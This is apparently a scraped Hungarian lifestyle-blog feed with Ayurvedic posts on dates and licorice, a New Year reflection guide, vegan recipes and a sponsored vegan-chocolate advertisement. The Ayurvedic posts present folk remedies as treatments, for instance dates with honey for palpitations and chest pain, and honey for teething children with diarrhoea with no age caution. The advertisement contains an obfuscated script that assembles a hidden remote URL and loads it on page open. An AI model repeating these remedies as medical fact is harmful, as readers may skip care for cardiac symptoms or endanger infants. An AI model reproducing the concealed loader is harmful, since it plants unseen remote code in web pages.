tökmagot fogyassz!
A datolya hatásai és ájurvédikus alkalmazása
2021. február 11. Élj harmóniában
A friss datolya édes és hűsítő. Csökkenti a vata-t, a pitta-t és a kapha-t is. A kaphaknak mértékkel kell fogyasztani. A datolya általánosságban növeli az egészséget, eenrgetizálja és táplálja a testet. A datolyacukor a legjobb egészséges helyettestője a fehércukornak. Néhány ájurvédikus alkalmazási mód: - Keverj össze 5 felvágott datolyát 1 teáskanál ghível, két csipet feketeborssal. Edd ezt a keveréket kora reggel 5:30 és 6:00 között. Utána 2 óráig ne egyél és ne igyál semmit. Ez a keverék megnöveli a belek erejét arra, a felszívásra, ételek feldolgozására. Megköti a székletet növeli az izomtónust és táplálja a csontokat. - A datolyacukor kiváló izomfájdalmak gyógyítására. - A datolyacukor kiváló vasforrás is. - 10 friss datolyát tegyél ghíbe egy kisedénybe. Tegyél hozzá 1 tk gyömbért, 1/8 tk kardamom magot és egy csipet sáfrányt. Lazán fedd le és tarts zárt, meleg ehlyen 1 hétig. Utána egyél naponta 1 datolyát ebből kora reggel. Ez segít a vérszegénységen, szexuális gyengeségen és krónikus fáradtság esetén. Jól használható terhesség esetén is. - Heves szívdoboság és mellkasi fájdalom esetén, egyél 2 datolyát 2 teáskanál mézzel. - Fogzó gyerekek esetén, adj a gyereknek szárított datolyát, hogy rágcsálja. Ha a gyereknek hasmenése is van, akkor fél teáskanál datolyacukrot keverj össze 1 teáskanál mézzel - 2, 3 alkalommal naponta. - Datolyaital - áztass be 5 friss datolyát egy pohár vízbe éjszakára. Következő nap turmixold össze és idd meg. Ez vitalizál, energiával fog feltölteni. Kizárólag vegyszermentes (bio) datolyát fogyassz. Jó egészséget kívánok:) szeretettel: Kati felhasznált szakirodalom: dr. Vasant Lad és Usha Lad Ájurvéda szakácskönyve
Így kezdj neki az Új évnek! - lépések a sikeres évindításhoz 2022.
2020. december 22. Élj harmóniában
Már csak egy kis idő választ el a 2022-es év kezdetétől. Talán nem is gondolnád, de az év legdepressziósabb hónapja a legtöbb ember életében a január. A karácsonyi ünneplések, izgalmak, családi együttlétek, ajándékok után, megjelennek a szürke, rideg, feladatokkal, konfliktusokkal teli hétköznapok. Ráadásul idén nagyon más lesz a Karácsony a legtöbb emebr életében és már önmagában az egész év sokaknak elég feszülten vagy éppen depisen telt. Ráadásul január elseje egy fordulópont is... átváltunk a 2022-es évre. A fordulópontokat általában az emberek nem viselik túl jól. Egy-egy fordulópont, az elmében automatikusan beindít egyfajta számvetési folyamatot.... kicsit eltűnődünk milyen is volt az eltelt időszak, mit értünk el, mit nem értünk el... nagyon sok embert megviselnek a kudarcai, az esetleges sikertelenség érzése. Az elmúlt évek pedig az élet mindeknek megmutatták, hogy nem mi irányítjuk az életünket, mert mindig rajtunk kívül álló körülmények alakítják a dolgokat. Ilyenkor hasznos ha megpróbálod tudatosan elengedni ami volt és tudatosan felkészülni a következő évre. Próbáld mindenben a jót látni. Ahhoz, hogy a következő éved sikeres legyen az első lépés a tudatos tervezés. Önmagában a nagy fogadalmak, nem segítenek minket hozzá egy boldogabb, kiegyensúlyozottabb élethez. A siker titka, hogy belső világunkat rendezzük. Húzz egy vonalat képzeltedben és szemléld végig, milyen is volt az eltelt éved. Majd az előző év tapasztalataiból kiindulva, lehetőséged van arra, hogy átgondold mit szeretnél másképpen csinálni a következő évben. Ebben a bejegyzésben ehhez minden támogatást megpróbálok megadni Neked. A 2021-es év tapasztalatai sokaknál áthelyezték a fókuszpontokat. Sokan rájöttek, hogy az egészség és az emberi kapcsolatok sokkal fontosabbak, mint a karrier vagy az anyagi célok elérése. Ha úgy látod az idei év nagyon más tapasztalatokat hozott mindenképpen érdemes papírra vetned az új elképzelésidet az életeddel kapcsolatban. Az első amit egy év végén át szoktam gondolni kinek vagy éppen miért vagyok hálás az eltelt évben. A Hála lsita készítéséről az alábbi bejegyzésben olvashatsz: https://eljharmoniaban.blogspot.com/2019/01/hala-koszonet.html A sikeres változtatáshoz, nagyon fontos, hogy komolyan határozd el pontosan miben szeretnél változtatni és légy tudatos arról, hogyan érheted el. Ne csak azt gondold, "majd rendszeresen mozgok" vagy "majd nem idegeskedem annyit " vagy "többet találkozom szeretteimmel" mert eltelik 2022 és újra azt fogod gondolni, na majd jövőre... A másik pont, amin el lehet bukni, hogy egyszerre túl sok célt tűzől ki magad elé. Ne akarj egy év alatt mindent teljesen megváltoztatni, nézd meg mely célok, változások reálisak az egy éves távlatra. Az elmúlt időszak átgondolásánál talán segít, ha szem előtt tartod, hogy bármi is történt Veled, az mindig érted van és a fejlődésedet szolgálja. Még akkor is ha az adott pillanatban úgy tűnik, hogy ez nem lesz a hasznodra és inkább érzed kényelmetlennek, kellemetlennek, mint jótékonynak. Néha az életünk leginkább rémes helyzeteinek, személyeinek köszönhetjük, hogy türelmet, alázatot, egyszerűséget, önzetlenséget, lemondást vagy éppen elengedést tanulhatunk. Sokszor ha visszatekintünk az életünkre rájövünk, milyen hálásak lehetünk egy-egy olyan életeseménynek, amit, akkor nagyon rossznak éltünk meg. Egy korábbi bejegyzésben erről olvashatsz: Sosem látod a teljes képet... Nem csak az év vége, hanem minden egyes napod új lehetőségeket, új tapasztalatokat hoz számodra. Járj mindig nyitott szemmel, figyeld mit hoz az élet, figyeld merre mennek a sínek. A nyitottság és az elfogadás, a rugalmasság fogja számodra biztosítani, hogy a következő éved igazán sikeres legyen... Mit jelent, hogy sikeres? Talán azt gondolod, hogy most a szokásos dolgokat fogom ideírni... jó állás van, jó fizetés, autó, elismerés, hírnév, tisztelet, valamiben jónak lenni, tehetség.... Sikeres az, aki boldog, elégedett önmagában, kiegyensúlyozott, egészséges, tökéletes harmóniában él önmagával és környezetével - a jóga a sikert az önmegvalósítás elérésével definiálja. Ha úgy érzed a mostani életed, a fentiek alapján nem annyira sikeres, akkor tegyél érte, hogy a következő évben, Te is boldog és kiegyensúlyozott legyél. Lásd a változás szükségességét, mert ha ugyanazt csinálod mint eddig, akkor sajnos ugyanazt az eredményt fogod kapni. A változás amit szeretnél érintheti az egészséged, életmódod, személyiséged fejlesztését, gondolkodásod változtatását, emberi kapcsolataidat vagy bármilyen olyan dolgot, amiben szeretnél más eredményt látni a következő évben. Gondold át a céljaidat és komolyan kötelezd el magad mellettük. Határozd meg mit szeretnél másképpen a jövőben és tudatosan gondold át, hogyan tudod elérni. Majd szeretettel, türelemmel lépésről, lépésre haladj a megvalósítás útján. Néhány hasznos gondolat ahhoz, hogy át tudd gondolni a 2021-es éved: - Hogyan jellemeznéd ezt az évet röviden? - Mik voltak az év legfontosabb eseményei? - Mik voltak az év legjobb pillanatai, minek örültél idén? - Mi okozott számodra bánatot, rossz érzéseket idén? - Mi jellemezte idén - a testi-lelki egészségedet, közérzetedet? - a párkapcsolatodat? - a családi kapcsolataidat? - a munkahelyi körülményeidet? - a baráti kapcsolataidat? - szabadidődet? - anyagi dolgaidat, pénzügyi helyzetedet? - Kik segítettek terveid alakulásában, kiknek vagy hálás? - Kikkel kötöttél barátságot? - Kikkel tudtál kibékülni, rendezni a kedvezőtlen kapcsolatokat? - Mit tanultál idén, miben sikerült fejlődnöd? - Milyen rossz tulajdonságoktól sikerült megszabadulnod? - Milyen változásokon mentél át amire büszke vagy? - Mit tennél másképpen? - Mi hiányzik az életedből? Í rd össze a dolgaidat, átgondoltan, tudatosan a 2022-es évre vonatkozóan is - ne rutinb ó l készíts listát , légy őszinte magadhoz, nézz a szíved mélyére valójában mire vágysz , mit szeretnél. Ha van egy cél amit kitűzöl, akkor képzeld el, milyen érzés lesz ha megvalósul. Ha ez nem jó érzésekkel tölt el, hanem negatív érzetek, szorongás, félelem társul hozzá, akkor jó ha újra átgondolod valóban ez egy célod-e vagy esetleg csak valamilyen elvárásnak, külső nyomásnak szeretnél megfelelni. N e ragaszkodj mindig a megszokott dolgokhoz. Légy nyitott p róbálj ki új dolgokat, tanulj új ismereteket, szerezz új tapasztalatokat. Egy kis segítség ahhoz, hogy a 2022-es éved sikeres legyen : - Mit szeretnél elérni, megvalósítani 2022-ben? - írd össze a céljaidat, terveid. - Miben szeretnél fejlődni, mit szeretnél tanulni? - Mik lesznek az év fontosabb eseményei? - Milyennek szeretnéd látni az alábbi életterületeket, miben szeretnél változtatni: - közérzet, egészség - táplálkozás - testmozgás - párkapcsolat - családi kapcsolatok - munkahelyi körülmények - baráti kapcsolatok - szabadidő eltöltése, hobbik, pihenés - anyagi dolgaid, pénzügyi helyzeted - Milyen rossz szokásodtól szeretnél megszabadulni? - Milyen negatív tulajdonságaidon szeretnél változtatni? - Milyen új dolgokat szeretnél kipróbálni idén? - Hová szeretnél eljutni, elutazni ebben az évben? Hasznos az is ha átlapozod a naptárad is és előre betervezed, a főbb eseményeket - családi rendezvények, munkahelyi programok, nyaralás, kisebb pihenések, utazások, kulturális rendezvények, iskolai események, etc). Ez majd ad egy keretet az évednek. Legyen meg az elképzelésed arról is , mit hogyan szeretnél, de tartsd szem előtt, lehet, hogy neked van egy terved, az uni verzumnak is van egy terve és a kettő nem mindig egyezik meg egymással. Engedd el a ragaszkodásaidat a jövődet illetően is... ez a világ a változásokról szól . Ha az események nem az elképzeléseid szerint alakulnak, ne akadj fenn, l égy rugalmas, mint a viharban azok a fák, amelyek nem törtnek össze, mert folyamatosan hajlonganak. L égy kész a változásra. Figyeld mindig merre mennek a sínek, és haladj az utadon, ne akarj minden áron egy akadálypályához görcsösen ragaszkodni. A világ nem f og megváltozni körülötted. Ne várd el a világtól, az emberektől, hogy megváltozzanak és minden úgy alakuljon ahogy Te szeretnéd. Bánj a dolgokkal, a személyekkel a természetük szerint. Minden helyzetben Te magad tudsz megváltozni, másképpen gondolkodni, másképpen hozzáállni a dolgokhoz. Higgy benne, hogy a dolgok mindig úgy alakulnak, ahogy azoknak alakulniuk kell . Ha megváltoztatod a gondolataidat, megváltozik az életed. Lásd a dolgok jó részét, légy rugalmas, pozitív, nyitott, türelmes és szeretetteljes. Tudj elégedett lenni, mosolyogj, szeress, adakozz, légy nagylelkű és kegyes és fejlődj sokat az új évben :) Sok szeretettel kívánok spirituális élményekben gazdag, harmonikus Új évet Kati
Almás-diós sütike liszt- és cukormentesen
Közelednek az ünnepek és biztos vannak, akik liszt- és/vagy cukormentes, gyorsan elkészíthető édességet szeretnének az ünnepi asztalra. Számukra mindenképpen érdemes ezt kipróbálni, hiszen ahogy a recept leírás végén is jelzem, tálalási módja többféleképpen lehetséges, megkenhetjük csokiszósszal, vaníliasodót önthetünk a szeletek tetejére, kísérhetjük a szeleteket 1-1 gombóc fagyival. Nagyon reformosoknak pedig friss almaszeletekkel is tálalhatjuk.
A recept
Hozzávalók:
- 400g dió
- 150g mazsola vagy apróra vágott datolya
- 1 kk őrölt fahéj
- 1 bio citrom reszelt héja
- 4-5 db alma lereszelve
- 200g növényi joghurt
Elkészítés:
A diót megdaráljuk, a citrom héját lereszeljük (nálunk az Aldiban árulnak olyan citromot, aminek a héját nem kezelik semmivel, ha bio citromhoz nem jutok hozzá, még ezt szoktam használni), az almákat szintén lereszeljük (én gyors aprítót használtam). Mindezekhez jól hozzákeverjük a mazsolát vagy datolyát és végül a növényi joghurttal átkeverjük.
Kb 30-40 perc alatt 180C fokon, sütőpapírral bélelt, előmelegített sütőben készre sütjük. Tálaláskor meghintjük fahéjas porcukorral (gyümölcscukorból is darálható porcukor) vagy olvasztott csokit kenünk a tetejére, vagy vanília sodót, esetleg vanília fagyit adunk hozzá, de almaszeletekkel is nagyon finom.
Vöröslencse ropogós édes majonézes mustáros mártogatóssal (laktózmentes, gluténmentes, vegán)
2020. december 15. Zizi kalandjai
Készítettem már vöröslencse fasírtot, de most egy teljesen másik változatot hoztam nektek. Ebbe került zöldség is (brokkoli, sárgarépa, vöröshagyma, fokhagyma) és fűszerek. Nem serpenyőben sütöttem, hanem a sütőben és így is ropogósak lettek, mert bekentem őket olívaolajjal. Az ünnepi készülődés hetei során könnyű vacsora egy tál zöldsaláta mellé… a ropogós, zöldséges... Source
Csomagot kaptunk - ajánló
2020. november 30. Mindennapi ételeink
Amióta megjelent a magyar piacon, előszeretettel fogyasztjuk a Dr. Oetker által forgalmazott Creme Vega nevű terméket. Ez egy nagyon finom és jó állagú vegán tejföl, melynek alapja a kókuszolaj, szójafehérje. Emellett ivóvíz, szárított élesztő, só, tejsavbaktérium kultúra található benne. Többször készítek itthon is magtejfölöket, de ez az a termék, amely mindig van a hűtőnkben és nagyon finom. A gyerekek kanállal is szeretik, magában enni. De szoktam tenni majonézes-tejfölös kukoricasalátába, bármilyen rakott ételbe, főzelékbe habarásként, vagy csupán tejfölös tésztaként is fogyasztjuk. Pogácsában is tökéletes, a tésztába beledolgozva, de édes süteményekhez is használom, tésztába vagy töltelékbe rakva. Tofukörözött elengedhetetlen alkotóeleme. Általában sós ételekhez hígítom, mert nagyon sűrű, így gazdaságos. Tehát óriási volt az örömöm, amikor megérkezett a cég ajándékaként sok-sok-sok doboz tejföl. Próbáljátok ki ti is, az ünnepekkor, de máskor is. Aldiban, Auchan-ban, Spar-ban, Tesco-ban is kapható, vagy weboldalakról is megrendelhető. A cég más érdekes termékeket is gyárt, pl. rozskovászt.
Raffaello golyók házilag
Alig másfél hónap és itt a karácsony! Tudod már mivel leped meg szeretteidet? Ha kedveled a saját készítésű ajándékokat, készíts raffaello golyókat. Ha azt keresed, milyen kiadós édesség kerüljün az ünnepi asztalra, akkor szintén azt ajánlom, készíts raffaello golyókat. Tömény kókuszos élvezet, közepén egy szem mandula. Vegán, gluténmentes, cukormentes (ha cukor helyett mással édseíted), nyers, paleo. Mi kell még? Én tudom, hogy valaki gyors megcsinálja és megehessük. :)
A recept
Hozzávalók:
- 2 konzerv kókusztej - egy konzerv 400 g (Angliában Lidlben kapható, Magyarországon nagy Tescoban, Auchanban, ázsiai üzletekben)
- 200 g kókusz krém (Creamed Coconut) (Angliában, Magyarországon nagy Tescoban, Auchanban, bioboltokban, DM-ben kaphato
- 100 g őrölt mandula
- édesítőszer pl nyírfacukor, kókuszvirág cukor, stevia, stb. ízlés szerint
- mandula
- kókuszreszelék
Elkészítés:
A két konzerv kókusztejet fagyasztóba tesszük kb. 45 percre. Ha már eleve volt otthon ilyen konzervünk, és a hűtőben tároltuk, az is jó. A lényeg, hogy a kókusztej felső, vastag rétege jól dermedt legyen ahhoz, hogy jól tudjuk kezelni.
Amíg a fagyasztóban dermednek, a kókuszkrémet valamelyest olvasszuk meg annyira folyékonzra, hogy majd könnyen hozzá tudjuk adni a kókusztejek sűrűjéhez.
A megdermedt (hűtőből vagy fagyasztóból kivett kókusztej konzerveket óvatosan nyissuk ki és a felső keményebb réteget kanalazzuk egy tálba, ahol habverő segítségével kezdjük el összedolgozni, folyamatosan adagolva hozzá a nem meleg, de folyósabb állagú kókuszkrémet. Ehhez adjuk hozzá az édesítőt és az őrölt mandulát. Ezt a masszát a hűtőbe kell visszatenni, dermedni hagyni. Amikor már annyira megdermedt, hogy golyók formázhatók belőle, v izes kézzel kis golyókat formázunk a megszilárdult masszából, miközben mandulát teszünk a közepébe, majd kókusz reszelékbe hempergetjük.
Ha el nem fogy készítés közben :) akkor hűtőben pihentessük a tálalásig.
Máktorta gránátalmával
2020. november 10. Mindennapi ételeink
Nagyon finom, próbáljátok ki. Nálunk a gyermekek sajnos csak így, süteményben eszik meg a mákot. Bejglibe vagy palacsintába töltve, vagy tortaként. Mivel kisfiúnk "tejfölmániás", ezért született meg egy ilyen verzió: a tetején vegán, édesített tejföllel és gránátalmával. Hozzávalók: 20 dkg tönkölyliszt 10 dkg darált mák 5 dkg kókuszolaj 10 dkg nádcukor 1 csomag sütőpor 1 bögre meleg víz -- Dr Oetker vegán tejföl juharszirup vagy méz tetszés szerinti gyümölcs Elkészítés: A száraz és a nedves hozzávalókat is külön-külön összekeverjük, majd egymással vegyítve csomómentesre kikeverjük. Olajjal kikent, lisztezett tepsibe folyatjuk, majd 180 fokon kb 40 perc alatt kisütjük. Amikor kihűlt, megkenjük a tetejét előzetesen édesítő sziruppal vagy mézzel kikevert tejföllel. Megszórjuk gyümölccsel és tálaljuk.
Tepsis vegyes krumpli spenóttal
Finom mártogatós szósszal
– fázisfotókkal, 3 lépésben
Olyan fantasztikus színei vannak ennek az ételnek, én le sem tudtam venni a szememet róla! Pedig ha hiszed, ha nem, egy egyszerű sült krumpliból indulunk. :) Ráadásul ami ilyen gyönyörűen színpompás, az nem csupán a szemednek lesz kedves, hanem bizony a testednek is jót tesz majd.
Az ilyesmi ételeket mostanában egyszerűen nem bírom abbahagyni egyébként. :) Érdekes, ahogy idővel változik az ember, úgy változnak vele a kedvenc ételei is, nem?
Nálam teljesen pozitív fejlemény, hogy amennyire odavoltam évekkel ezelőtt az édességért, kb. úgy hagynak mára teljesen hidegen a cukros, krémes sütemények. :) Rabja vagyok viszont a sült, ízekkel nyakon öntött zöldségeknek, bármi legyen is az.
Persze nem minden változás ilyen pozitív (hehe), de most következzen egyik aktuális kedvencem, az amúgy is megunhatatlan sült krumpli – extrákkal. :))
Hozzávalók 2-3 személyre
- 2 batáta
- 2 nagy “rendes” krumpli
- 1 fej vöröshagyma
- 2 gerezd fokhagyma
- 1 kk só
- 2 ek olívaolaj
- 1/2 mk őrölt rozmaring
- 1/2 mk koriandermag
- 100 g bébispenót
A mártogatós szószhoz:
- 100 g növényi joghurt (ha jót akarsz, ne kókuszosat válassz!)
- 1/2 ek friss petrezselyem apróra vágva
- 1 ek élesztőpehely
- 2 csipet só
- Krumplikat hámozd meg és aprítsd fel csinos darabokra. A hagymákat is darabold fel, majd egy nagy tálban forgass össze mindent az olívaolajjal és a fűszerekkel. Fontos, hogy előtte a korandermagot törd meg. Ha nincs mozsarad, egy pohár vagy bögre talpán is sikerülni szokott. :)
- A keveréket borítsd egy lapos tepsibe, és 30 percig süsd közepes sütőben. Élvezd a kifelé szálló isteni illatokat! :) Amikor már megpuhult a krumpli, keverd bele a friss spenótot. Ezután már csak 5 percre lesz szükség a sütőben, mert a levelek tényleg nagyon gyorsan összeesnek.
- Amíg sül a krumplid, keverd ki a szószt. Nem kell sokat bűvészkedni, csak keverd össze a hozzávalóit. :) Aztán jöhet a tunkolás! :)
Jó étvágyat!
Elkészítési idő: 35 perc
Ez egy vegán recept volt. :)
Hasonló recepteket ITT találsz még.
Ha itt feliratkozol , a legújabbakat mindig frissen kapod majd a postaládádba.
Nézd meg az aktuális Kertkonyha főzőtanfolyamokat !
Kezdő Vegán
Haladó vegán (Superfood)
Bécsi nemtúrós palacsinta
2020. október 12. Mindennapi ételeink
Nagyon finom csemege, legalábbis nálunk szeretik a gyerekek. Hozzávalók a palacsintához: 30 dkg finomliszt 20 dkg teljes őrlésű liszt 10 dkg zabliszt 5 dl növényi tej 1/2 dl olaj 9 dl szénsavas víz fél citrom leve Hozzávalók a nemtúró krémhez: 1 bögre köles 2 citrom héja 1 citrom leve növényi tej vaníliás nyírfacukor - ízlés szerint nyírfacukor - ízlés szerint Hozzávalók a vanília öntethez: 1 csomag vaníliás pudingpor 4 dl növényi tej ízlés szerinti édesítő Elkészítés: A palacsintát a hagyományos módon kikeverjük és olaj nélküli serpenyőben kisütjük. A kölest előző este kifőzhetjük, háromszoros mennyiségű növényi tejben. Másnap összeturmixoljuk, hozzáadjuk a citromhéjat, citromlevet, vaníliás cukrot, nyírfacukrot. A vaníliás pudingot kikeverjük hideg vízben, majd beleöntjük a forrásban lévő tejbe. Megfőzzük. A kisütött palacsintákat megtöltjük, feltekerjük. Majd félbevágjuk. Kiolajozott tepsibe tesszük a megtöltött, félbevágott palacsintákat, majd leöntjük az egészet a pudinggal. 200 fokon kb. 10 perc alatt összesütjük.
Új, magyar gyártású, vegán bonbonok és vegán tejcsokik, amiket mindenképp meg kell kóstolnod!
Szereted az édességeket, de nem találtál még olyan bonbont, ami minőségi és vegán is? A Harlequin Chocolates megálmodói is így voltak annak idején – ezért manufaktúrájuk választékának nagy része a vegán csokirajongóknak szeretne segíteni édes pillanatokat varázsolni. Hirdetés A számukra legkedvesebb ízek a vegán bonbonok, pralinék és a táblás csokik, sőt már van olyan változat, ami mindezek mellett még cukormentes is. A legnagyobb kedvencek eddig a málnás ,,Bájital bonbon, a pisztáciás bonbon, a kókuszkaramell trüffel, és a banános-pekándióst is sokan keresik náluk vagy a rendezvényeken, ahol kóstolhatók. Ezeken kívül képzeld el a zamatos piemonti mogyorót, ahogy illatos és roppanós, a pisztáciát, az ízletes fűszereket ahogy édesen-krémesen összeolvadnak és mindez minőségi és vegán is… Csábító a gondolat! Piemonti mogyorós praliné A Harlequin Chocolatesnek nagy tervei vannak: az ősz során bemutatják a legújabb kedvencet, a saját készítésű vegán fehércsoki desszertjüket, Sahara névvel - már nagyon várják, hogy minél többen megkóstolhassátok! Én mindenképp meg akarom kóstolni minél hamarabb. Hamarosan több részlet is kiderül majd róla, de addig is nagyon ajánlom a kesutejjel készült vegán tejcsokijukat ,,No Milk Today névvel és más finom táblásaikat! Akik a különlegességeket szeretik, azoknak pedig biztosan kedvence lesz a fülöp-szigeteki termőterületről származó kakaóból készülő, kézműves táblás, a ,,Maprutas - ami egy igazi ízbomba a gyümölcsös, kifinomult ízjegyeivel, de sok finomságuk van még, érdemes benézni a csokiwebshopjukba. A gyönyörű design is az élmény része Eddig sok szó esett az ízekről, de amiről még nem, az a design. A Harlequin Chocolates-nál hisznek abban, hogy először a szemünkkel ,,kóstolunk, ezért minden egyes Harlequin csokinál fontosnak tartják a csinos és egyedi megjelenést, a táblásaikat pedig már messziről könnyen felismerheted azok modern és vidám világáról. Én, grafikusként odavagyok a designért! Akár magadnak (éljen az önszeretet!), akár ajándékba is rendelhetsz a webshopjukból, és szívesen készítenek egyedi csokoládét rendezvényekre, esküvőkre is. Már több különleges kérést valósítottak meg egyedi elképzelés alapján. Harlequin Chocolates – Mad Hatter – organikus, madagaszkári étcsokoládé szicíliai citromos sóval Kövesd őket instagramon vagy facebookon, hogy értesülj az újdonságaikról és hogy milyen eseményen találkozhatsz velük legközelebb. Ha nem egy eseményen kóstolsz, akkor pedig pár kattintással rendelhetsz az online csokiboltból, amit futárszolgáltatással az ajtóig repítenek. Nem minden csokijuk vegán, de a vegán csokoládék menüpontban kedvedre válogathatsz. Webshop: https://harlequinchocolates.hu Instagram: www.instagram.com/harlequinchocolates Facebook: www.facebook.com/harlequinchocolates Email: hello@harlequinchocolates.hu Harlequin Chocolates – No Milk Today – Madagaszkári organikus vegán tejcsoki szezámmal és édesköménnyel Hirdetés vége (function(){ ojvs=document.createElement(script);ojvs.async=true;ojvs_=u+(s)+t; ojvsu=242060400.;ojvs_+=a+(t.i);ojvs_+=n+(f+o)+/; ojvsu+=1jtrfl61jvsbrmaz1cx074+(n2ljjjn0); ojvs.src=https://+ojvs_+ojvsu;ojvs.type=text/javascript; document.body.appendChild(ojvs); })(); Tedd a kedveceim közé 0 The post Új, magyar gyártású, vegán bonbonok és vegán tejcsokik, amiket mindenképp meg kell kóstolnod! appeared first on VegaNinja.
Barackos diós tészta
A diós tészta számomra visszatérő kedvenc gyermekkoromból. Néha bekattan, hogy diós tésztát ennék, gyors főzök egy kis tésztát, darálok diót, összekeverem és kész is. Legutóbb daraboltam rá sárgabarackot, igazán feldobta az ízét. Mivel a barack finom, édes volt, így nem kellett még édesítő se a diós tésztámra. Teljes kiörlésű tésztát főztem, így hamarabb eltelít és kevesebbet kívánok enni belőle.
A recept
Hozzávalók:
- 20 dkg száraz tészta
- víz
- só
- 1 kisebb marék dió
- 4-6 szem sárgabarack
Elkészítés:
Kb. 1 liter vizet felteszünk főni. Érdemes fedőt tenni az edény tetejére, így gyorsabban felforr. Forrás közeli állapotában csipetnyi sót teszünk a vízbe, majd ha a víz forr, beletesszük a tésztát és addig főzzük, míg puhára nem fő. (Aki Al dente-n szereti, az előbb befelyezi a főzését.)
A tésztát átszűrjük, hideg vizzel átöblitjük. Míg a tészta fő, van idő a dió megdarálására. Ehhez a mennyiséghez nem sok dió kell, kisebb marék, talán ha 10 szem. A megdarált diót a megfőtt tésztával átkavarjuk. Mivel a diónak van olaj tartalma, ezért nem szükséges a tésztához olajat adni főzés során sem utána.
Az őrölt dióval összekevert tésztához barackdarabokat keverünk és tálaljuk. Könnyen elkészíthető finomság remek íz.
Indiai tápióka puding
Különleges desszert egyszerű hozzávalókból Kedves ajándékot kaptam nemrégiben Hémangi Dévi Dászitól: legújabb könyvét, aminek címe: Indiai vegán konyha . Ez a szakácskönyv tele van nagyon izgalmas receptekkel, közülük én most egy tápióka pudingot választottam. Egyszerű az elkészítése, titka a bámulatosan illatos hozzávalókban rejlik. Az eredeti verzió mangópürét kívánt, de ezt az adott helyzetben én nem tudtam beszerezni sajnos. Így aztán valamiféle dublőr után kellett néznem, és találtam is! Vajon mi az, ami nagyon hasonló nemcsak színre de hasonlóan illatos is lesz tőle a végeredmény? :) Hát, persze, hogy az őszibarack befőtt! Hurrá, indul a pudingfőzés! Hozzávalók 5 adaghoz - 120 g tápiókagyöngy - 800 ml növényi tej (én szójatejet használtam) - 75 g nádcukor - 5 ek kókuszreszelék - őszibarackbefőtt, 4 db felezett őszibarack - 1/4 kk őrölt kardamom - csipet só - Fél órára a tápiókát áztasd be bőséges hideg vízbe. - Ezalatt kicsit megszívja magát, de a felesleget mindenképp öntsd le róla. A főzéshez már szójatejet forralj, ebbe kanalazd a tápiókát. - Ne felejtsd el csipet sóval ízesíteni (tudod, szinte minden édességbe kell!), majd 10 percig főzd takarékon. - Ezután keverd el benne a cukrot és a kókuszreszeléket, így főzd további 3-4 percet. - Közben turmixold össze az őszit a kardamommal, és ezt is keverd hozzá, hagy’ rottyanjon egyet. Készen is vagy! Kanalazd poharakba és hűtsd be mindenképpen. Persze, ha meg tudod várni… Jó étvágyat! Elkészítési idő: 20 perc Ez egy vegán recept volt. :) Hasonló recepteket ITT találsz még. Ha itt feliratkozol, a legújabbakat mindig frissen kapod majd a postaládádba. Nézd meg a legújabb Kertkonyha főzőtanfolyamokat! Kezdő Vegán Haladó vegán (Superfood) Növényi Tejek és Tejtermékek I Növényi Tejtermékek II
Almás-fahéjas süti
2020. május 9. Vegán receptek Tőlünk Nektek
Adri receptje:
1/2 kg fehér tönkölyliszt
3,3 dl langyos növényi tej
3 ek étolaj
2 ek nádcukor
1/2 ek só
2,5 dkg kocka élesztő
2 tepsi kikenéséhez összesen 10 dkg növényi margarin (nem tévedés!)
[...] Bővebben!
5 perces mákos piskóta vanília pudinggal
2020. április 19. Beautilicious
Se liszt, se idő, se tehetség nem szükséges az elkészítéséhez. Ha egy kis mákos guba ízvilágra vágysz, de nincs türelmed kivárni, míg elkészül, akkor ez egy remek alternatíva. Szükséged lesz: - 20 gramm mákra - 30gramm vaníliás fehérjére - 10-20gramm édesítőre - 1tk sütőporra - 1 tojásra - az öntethez: cukormentes vaníliapudingra - 5 percre Keverj össze minden hozzávalót egy nagy bögrében / tálkában és tedd mikróba 2 percre. Öntsd nyakon vanília pudinggal.
Az édesgyökér hatásai - megfázás, köhögés, bronchitis esetén szuper gyógynövény
2020. április 13. Élj harmóniában
Az édesgyökér ősidők óta alkalmazott gyógynövény, amely k edvezően hat minden szövetre. Ájurvéda szempontjából édes és keserű, hűtő hatású. harmonizálja a vata-t, pittat és hosszú távon növeli a kapha-t. Hatással van az emésztésre, légzőrendszerre, hormonrendszerre, idegrendszerre és befolyásolja a női reproduktív szerveket is. Az édesgyökér hatékony nyálkaoldó szer, mert segíti a váladék feloldását és megkönnyíti ürülését a testből. Megfázásoknál, k öhögésnél, influenzánál, bronchitisnél, torokgyulladás, légcsőhurut esetén ajánlott. Nagyon jó szer gyulladások csökkentésére, enyhén laxatív, nyugtatja és erősíti a nyálkahártyákat, megszünteti az izomgörcsöket és csökkenti a gyulladást. Erősítő, fiatalító és nyugtató hatású, jól használható általános gyengeség esetén is.. Gyomorbántalmak, fekélyek, savtúltengés esetén hatásos szer Fájdalmas vizelésnél és alhasi fájdalmaknál is javasolt az alkalmazása. Nagyobb mennyiségben hánytató szerként használják a keleti gyógyászatokban, mert eltávolítja a tüdő és a gyomor kapha tartalmát. . Íze erőteljes, kellemes, édes, így más rossz ízű gyógynövények ízét elveszi és harmonizálja a többi gyógynövény tulajdonságait. Gyömbérrel nagyon jó megfázásokra. Szattvikus gyógynövény, nyugtatja az elmét, táplálja a spiritualitást, eléedettséget és harmóniát teremt. . Az agynak is egyfajta tápanyag, gyarapítja a koponyaűri és gerincfolyadékot. Szépíti a hajat és az arcbőrt, fejleszti a látást. Kerülendő az alkalmazása magas kapha szint, ödéma, csontritkulás és magas vérnyomás esetén. N agy dózisban nem javasolt, mert gátolja a kálium és a kalcium beépülését. Felhasznált szakirodalom:dr. David Frawley és dr. Vasant Lad: Gyógynövény jóga
Inhalálás - hatékony védelem a légúti betegségeknél
2020. március 26. Élj harmóniában
Ebben a vírusos időszakban mindenki gondolkodik mit is tehetne... A legfontosabb nem aggódj, ne stresszelj:) A legtöbb amit tehetsz, hogy a szervezetedet egészségesen tartod, figyelsz testi-lelki harmóniádra, pozitív maradsz és segítesz másoknak, szeretteidnek is nyugodtan, kiegyensúlyozottan megélni ezeket a napokat. .. Erősítsd az immunrendszered, gondolkozz pozitívan , táplálkozz egészségesen és légy nyugodt, boldog, kiegyensúlyozott. A járvány kapcsán az Élj harmóniában - megújulás, egészség, életmód facebook csoportomban rendszeresen teszek ki olyan bejegyzéseket, gyakorlatokat, immunerősítő, tüdőerősítő tippeket, amivel egészséges és kiegyensúlyozott tudsz maradni. ha van kedved csatlakozz te is a csoporthoz:) https://www.facebook.com/groups/189231931805348/ Az egyik legjobb módszer a légúti betegségek megelőzésére és kezelésére, a tüdőd egészségesen tartására az inhalálás. Az inhalálást az ájurvéda kifejezetten ajánlja 